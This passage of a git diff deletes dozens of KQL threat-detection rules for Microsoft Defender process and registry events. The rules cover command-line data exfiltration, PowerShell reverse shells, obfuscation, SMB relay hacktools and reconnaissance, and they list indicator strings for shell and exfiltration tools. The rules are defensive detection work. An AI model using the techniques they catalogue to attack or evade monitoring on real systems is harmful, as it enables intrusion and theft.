--- a/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/02 -// Level: high -// Description: Detects the use of various CLI utilities exfiltrating data via web requests -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (((ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "net view" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "sc query" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and ProcessCommandLine contains " C:\\")) \ No newline at end of file diff --git a/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql b/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql deleted file mode 100644 index 0f2eb648..00000000 --- a/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @gott_cyber -// Date: 2022/07/31 -// Level: medium -// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. -// Tags: attack.discovery, attack.execution, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe" \ No newline at end of file diff --git a/Execution/Potential_Dosfuscation_Activity.kql b/Execution/Potential_Dosfuscation_Activity.kql deleted file mode 100644 index d84c9691..00000000 --- a/Execution/Potential_Dosfuscation_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/02/15 -// Level: medium -// Description: Detects possible payload obfuscation via the commandline -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t " \ No newline at end of file diff --git a/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql b/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql deleted file mode 100644 index a07c661e..00000000 --- a/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020/10/11 -// Level: low -// Description: Detects specific combinations of encoding methods in PowerShell via the commandline -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join"))) \ No newline at end of file diff --git a/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql b/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql deleted file mode 100644 index 45a8fd0c..00000000 --- a/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel -// Date: 2023/11/09 -// Level: medium -// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE -The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http" \ No newline at end of file diff --git a/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql b/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql deleted file mode 100644 index 7010220a..00000000 --- a/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022/04/08 -// Level: high -// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe" \ No newline at end of file diff --git a/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql deleted file mode 100644 index 96f4cd8e..00000000 --- a/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/14 -// Level: medium -// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state -// Tags: attack.execution, attack.persistence, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") \ No newline at end of file diff --git a/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql b/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql deleted file mode 100644 index 901cfc87..00000000 --- a/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) -// Date: 2020/10/15 -// Level: high -// Description: Detects the PowerShell command lines with special characters -// Tags: attack.execution, attack.defense_evasion, attack.t1027, attack.t1059.001 -DeviceProcessEvents -| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);")))) \ No newline at end of file diff --git a/Execution/Potential_PowerShell_Downgrade_Attack.kql b/Execution/Potential_PowerShell_Downgrade_Attack.kql deleted file mode 100644 index 1a70acae..00000000 --- a/Execution/Potential_PowerShell_Downgrade_Attack.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Harish Segar (rule) -// Date: 2020/03/20 -// Level: medium -// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 -// Tags: attack.defense_evasion, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe" \ No newline at end of file diff --git a/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql b/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql deleted file mode 100644 index b0d3f76d..00000000 --- a/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020/10/11 -// Level: high -// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc "))) \ No newline at end of file diff --git a/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql b/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql deleted file mode 100644 index 94151df4..00000000 --- a/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/07/09 -// Level: high -// Description: Detects suspicious encoded character syntax often used for defense evasion -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains "(WCHAR)0x" \ No newline at end of file diff --git a/Execution/Potential_Powershell_ReverseShell_Connection.kql b/Execution/Potential_Powershell_ReverseShell_Connection.kql deleted file mode 100644 index 62c86967..00000000 --- a/Execution/Potential_Powershell_ReverseShell_Connection.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/03/03 -// Level: high -// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index 1bbe2f01..00000000 --- a/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community -// Date: 2023/02/14 -// Level: medium -// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products -// Tags: attack.execution, attack.t1047, car.2016-03-002 -DeviceProcessEvents -| where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index 82b19961..00000000 --- a/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali -// Date: 2023/02/14 -// Level: medium -// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Potential_RDP_Session_Hijacking_Activity.kql b/Execution/Potential_RDP_Session_Hijacking_Activity.kql deleted file mode 100644 index b2e0b52b..00000000 --- a/Execution/Potential_RDP_Session_Hijacking_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @juju4 -// Date: 2022/12/27 -// Level: medium -// Description: Detects potential RDP Session Hijacking activity on Windows systems -// Tags: attack.execution -DeviceProcessEvents -| where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and ProcessIntegrityLevel =~ "SYSTEM" \ No newline at end of file diff --git a/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql deleted file mode 100644 index 439202c1..00000000 --- a/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: blueteamer8699 -// Date: 2022/01/03 -// Level: medium -// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine -// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 -DeviceProcessEvents -| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe"))) \ No newline at end of file diff --git a/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql b/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql deleted file mode 100644 index 6e6b74ac..00000000 --- a/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/30 -// Level: medium -// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow -// Tags: attack.execution, attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe") \ No newline at end of file diff --git a/Execution/Potential_Renamed_Rundll32_Execution.kql b/Execution/Potential_Renamed_Rundll32_Execution.kql deleted file mode 100644 index 195901b1..00000000 --- a/Execution/Potential_Renamed_Rundll32_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/22 -// Level: high -// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe")) \ No newline at end of file diff --git a/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql b/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql deleted file mode 100644 index d7b1df2c..00000000 --- a/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/07/24 -// Level: critical -// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation -// Tags: attack.execution, attack.t1557.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes "))) \ No newline at end of file diff --git a/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql b/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql deleted file mode 100644 index 5c5ff61b..00000000 --- a/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/20 -// Level: medium -// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" -// Tags: attack.execution, attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql b/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql deleted file mode 100644 index b329e821..00000000 --- a/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Joseph Kamau -// Date: 2024/05/27 -// Level: medium -// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt. - -// Tags: attack.execution, attack.t1204.002 -DeviceProcessEvents -| where ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe" or FolderPath startswith "") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader") \ No newline at end of file diff --git a/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index a96027da..00000000 --- a/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/20 -// Level: medium -// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql b/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql deleted file mode 100644 index 0fec1416..00000000 --- a/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: megan201296 -// Date: 2019/02/13 -// Level: high -// Description: Detects registry keys related to Ursnif malware. -// Tags: attack.execution, attack.t1112 -DeviceRegistryEvents -| where (ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\Software\\AppDataLow\\Software\\Microsoft") and (not((RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\Internet Explorer" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\RepService" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\IME" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\Edge"))) \ No newline at end of file diff --git a/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql b/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql deleted file mode 100644 index e0957f2c..00000000 --- a/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis @Karneades -// Date: 2019/04/03 -// Level: medium -// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. -// Tags: attack.execution, attack.t1047, attack.t1059.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" \ No newline at end of file diff --git a/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql b/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql deleted file mode 100644 index ea6c5d19..00000000 --- a/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/06 -// Level: high -// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec -// Tags: attack.execution, attack.t1106 -DeviceProcessEvents -| where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains "OpenProcessToken" or ProcessCommandLine contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe"))) \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql b/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql deleted file mode 100644 index 25ef6289..00000000 --- a/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/12 -// Level: medium -// Description: Detects potentially suspicious child processes of a ClickOnce deployment application -// Tags: attack.execution, attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\" \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql b/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql deleted file mode 100644 index 4dc7fab5..00000000 --- a/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/26 -// Level: medium -// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql b/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql deleted file mode 100644 index 0c3792ca..00000000 --- a/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/31 -// Level: medium -// Description: Detects potentially suspicious child processes of WinRAR.exe. -// Tags: attack.execution, attack.t1203 -DeviceProcessEvents -| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath 